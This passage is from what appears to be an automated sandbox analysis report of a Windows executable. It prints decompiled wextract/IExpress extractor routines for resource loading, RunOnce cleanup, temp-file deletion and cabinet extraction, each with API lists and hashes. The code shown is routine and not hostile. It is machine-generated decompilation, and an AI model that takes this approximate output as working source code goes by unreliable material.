                                                                                                                                                                                                                                            					 *0x10d9124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E010D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x10d9124 = E010D6285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x010d51fb
                                                                                                                                                                                                                                            0x010d5207
                                                                                                                                                                                                                                            0x010d520b
                                                                                                                                                                                                                                            0x010d523c
                                                                                                                                                                                                                                            0x010d5268
                                                                                                                                                                                                                                            0x010d5270
                                                                                                                                                                                                                                            0x010d528b
                                                                                                                                                                                                                                            0x010d5293
                                                                                                                                                                                                                                            0x010d529c
                                                                                                                                                                                                                                            0x010d52a6
                                                                                                                                                                                                                                            0x010d52b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d52b0
                                                                                                                                                                                                                                            0x010d529e
                                                                                                                                                                                                                                            0x010d5279
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d527b
                                                                                                                                                                                                                                            0x010d5273
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5273
                                                                                                                                                                                                                                            0x010d524a
                                                                                                                                                                                                                                            0x010d5250
                                                                                                                                                                                                                                            0x010d5256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d5256
                                                                                                                                                                                                                                            0x010d5219
                                                                                                                                                                                                                                            0x010d5223
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46A0
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: SizeofResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46A9
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010D46C3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LoadResource.KERNEL32(00000000,00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46CC
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: LockResource.KERNEL32(00000000,?,010D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46D3
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: memcpy_s.MSVCRT ref: 010D46E5
                                                                                                                                                                                                                                              • Part of subcall function 010D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010D46EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010D2F4D,?,00000002,00000000), ref: 010D5201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010D5250
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                              • Part of subcall function 010D6285: GetLastError.KERNEL32(010D5BBC), ref: 010D6285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: cd17712228d3c7022e5bcd14cef9cedcbc5e5ff81984b1c2bbae8dd37e66f5c4
                                                                                                                                                                                                                                            • Instruction ID: 9dc075ffa85ff16943a10f021ac7e458c679cc46459b8cf2e1e6a8eca8bcb0d3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd17712228d3c7022e5bcd14cef9cedcbc5e5ff81984b1c2bbae8dd37e66f5c4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1911C8B5702301ABD3656BB59C45F7B65EDEBCA394B00442DFEC2D6584DE7E8C014228
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D1FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0x10d8530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x010d1fee
                                                                                                                                                                                                                                            0x010d2005
                                                                                                                                                                                                                                            0x010d200d
                                                                                                                                                                                                                                            0x010d2017
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d2020
                                                                                                                                                                                                                                            0x010d200d
                                                                                                                                                                                                                                            0x010d2029

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010D538C,?,?,010D538C), ref: 010D2005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(010D538C,wextract_cleanup2,?,?,010D538C), ref: 010D2017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(010D538C,?,?,010D538C), ref: 010D2020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                            • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                            • Opcode ID: 1d631d110ecd28433f40a3823eba7786a527194f12accbed3bcbe1f9f0e302cc
                                                                                                                                                                                                                                            • Instruction ID: b383128f3b5df4afc10fcca19cf3e39e25707b06240a20ecd6d6cf88b70c1869
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d631d110ecd28433f40a3823eba7786a527194f12accbed3bcbe1f9f0e302cc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18E04F30651318FBEB318A91EC0EF597F6AEB00780F104299FE84A1059E7665A10D708
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E010D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0x10d91e0;
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0x10d8a24 == 0 &&  *0x10d9a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0x10d8a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0x10d8a24 == 0 &&  *0x10d9a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E010D1781( &_v268, 0x104, _t22, 0x10d91e4);
                                                                                                                                                                                                                                            					if(( *0x10d9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E010D65E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E010D2390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0x10d8a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0x10d9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E010D1FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0x10d8a20 =  *0x10d8a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E010D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x010d52b6
                                                                                                                                                                                                                                            0x010d52b6
                                                                                                                                                                                                                                            0x010d52b6
                                                                                                                                                                                                                                            0x010d52c1
                                                                                                                                                                                                                                            0x010d52c8
                                                                                                                                                                                                                                            0x010d52cb
                                                                                                                                                                                                                                            0x010d52cc
                                                                                                                                                                                                                                            0x010d52d4
                                                                                                                                                                                                                                            0x010d52d6
                                                                                                                                                                                                                                            0x010d52d7
                                                                                                                                                                                                                                            0x010d52de
                                                                                                                                                                                                                                            0x010d52e0
                                                                                                                                                                                                                                            0x010d52f2
                                                                                                                                                                                                                                            0x010d52fa
                                                                                                                                                                                                                                            0x010d52fa
                                                                                                                                                                                                                                            0x010d5302
                                                                                                                                                                                                                                            0x010d5305
                                                                                                                                                                                                                                            0x010d530c
                                                                                                                                                                                                                                            0x010d5312
                                                                                                                                                                                                                                            0x010d5316
                                                                                                                                                                                                                                            0x010d5316
                                                                                                                                                                                                                                            0x010d5317
                                                                                                                                                                                                                                            0x010d531c
                                                                                                                                                                                                                                            0x010d531f
                                                                                                                                                                                                                                            0x010d5333
                                                                                                                                                                                                                                            0x010d5345
                                                                                                                                                                                                                                            0x010d5351
                                                                                                                                                                                                                                            0x010d5359
                                                                                                                                                                                                                                            0x010d5359
                                                                                                                                                                                                                                            0x010d5363
                                                                                                                                                                                                                                            0x010d5369
                                                                                                                                                                                                                                            0x010d536f
                                                                                                                                                                                                                                            0x010d5374
                                                                                                                                                                                                                                            0x010d5374
                                                                                                                                                                                                                                            0x010d5381
                                                                                                                                                                                                                                            0x010d5387
                                                                                                                                                                                                                                            0x010d5387
                                                                                                                                                                                                                                            0x010d538f
                                                                                                                                                                                                                                            0x010d53a0

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000080,?,00000000), ref: 010D52F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 010D52FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,?,00000000), ref: 010D5305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 010D530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(010D11FC,?,010D91E4), ref: 010D5363
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2833751637-0
                                                                                                                                                                                                                                            • Opcode ID: e9649c367017c85b7069fb80507ba971a30f4d6f5b5b37aea655f8d6e36475be
                                                                                                                                                                                                                                            • Instruction ID: 3d297d03583c70ccbe2e03df99f2271f6fd25f6a6fb8ccb19ffd4b185023174f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9649c367017c85b7069fb80507ba971a30f4d6f5b5b37aea655f8d6e36475be
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1621A131502315DBEB719B2CEC08BA97BF0BB14714F04819AFDC257198CFBA5984CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E010D4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                            				struct _FILETIME _v12;
                                                                                                                                                                                                                                            				struct _FILETIME _v20;
                                                                                                                                                                                                                                            				FILETIME* _t14;
                                                                                                                                                                                                                                            				int _t15;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t21 + 0x10d8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t14 =  &_v12;
                                                                                                                                                                                                                                            					_t15 = SetFileTime( *(_t21 + 0x10d8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                            					if(_t15 == 0) {
                                                                                                                                                                                                                                            						goto L5;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x010d4c40
                                                                                                                                                                                                                                            0x010d4c4a
                                                                                                                                                                                                                                            0x010d4c8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4c70
                                                                                                                                                                                                                                            0x010d4c70
                                                                                                                                                                                                                                            0x010d4c7e
                                                                                                                                                                                                                                            0x010d4c86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d4c8a

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010D4C54
                                                                                                                                                                                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010D4C66
                                                                                                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 010D4C7E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2071732420-0
                                                                                                                                                                                                                                            • Opcode ID: 5459a84ccaa6d8c60f999920d5e9f7df22f53c5f46483023da58160094eb8f21
                                                                                                                                                                                                                                            • Instruction ID: 50e989a5598fe0597fecb74f71280de1c131e51ff2b1aadb885ddb7a73b3cf3e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5459a84ccaa6d8c60f999920d5e9f7df22f53c5f46483023da58160094eb8f21
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5F0907260020DBFABA4EFB8CC49DFB7BEDEB04240744466BE996C2450FA35D514C7A0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E010D4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				char* _t70;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				char* _t72;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0x10d91d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E010D4E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E010D6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0x10d8584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t58 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t19 =  &(_t58[1]); // 0x10d91e5
                                                                                                                                                                                                                                            						_t70 = _t19;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - _t70;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t22 = _t59 + 1; // 0x10d91e6
                                                                                                                                                                                                                                            						_t30 = _t22 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t30 = E010D4702( &_v268, 0x10d91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E010D476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E010D4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E010D47E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x10d93f4 =  *0x10d93f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t63 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t6 =  &(_t63[1]); // 0x10d91e5
                                                                                                                                                                                                                                            						_t72 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - _t72;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t9 = _t64 + 1; // 0x10d91e6
                                                                                                                                                                                                                                            						_t30 = _t9 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x10d91e4;
                                                                                                                                                                                                                                            						_t30 = E010D4702( &_v268, 0x10d91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E010D4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E010D4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
